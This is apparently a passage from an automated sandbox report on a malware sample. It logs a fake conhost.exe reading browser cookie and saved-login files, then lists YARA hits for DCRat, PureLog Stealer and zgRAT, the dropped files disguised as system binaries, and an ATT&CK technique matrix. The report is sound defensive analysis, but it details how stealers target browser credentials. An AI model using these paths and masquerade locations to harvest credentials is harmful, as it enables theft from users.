                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: msinto.exe PID: 6248, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 1924, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: hPeZTHbzcsUskSflSyozwAqUA.exe PID: 3352, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.2096226398.0000000000B12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000000.2352080688.0000000000A02000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2119459063.0000000004625000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts1
                                    Native API                                    		11
                                    Scripting                                    		1
                                    Abuse Elevation Control Mechanism                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Deobfuscate/Decode Files or Information                                    		1
                                    Credential API Hooking                                    		3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAt31
                                    Registry Run Keys / Startup Folder                                    		12
                                    Process Injection                                    		1
                                    Abuse Elevation Control Mechanism                                    		Security Account Manager237
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Credential API Hooking                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook31
                                    Registry Run Keys / Startup Folder                                    		3
                                    Obfuscated Files or Information                                    		NTDS631
                                    Security Software Discovery                                    		Distributed Component Object Model1
                                    Clipboard Data                                    		Protocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                                    Software Packing                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    DLL Side-Loading                                    		Cached Domain Credentials341
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    File Deletion                                    		DCSync1
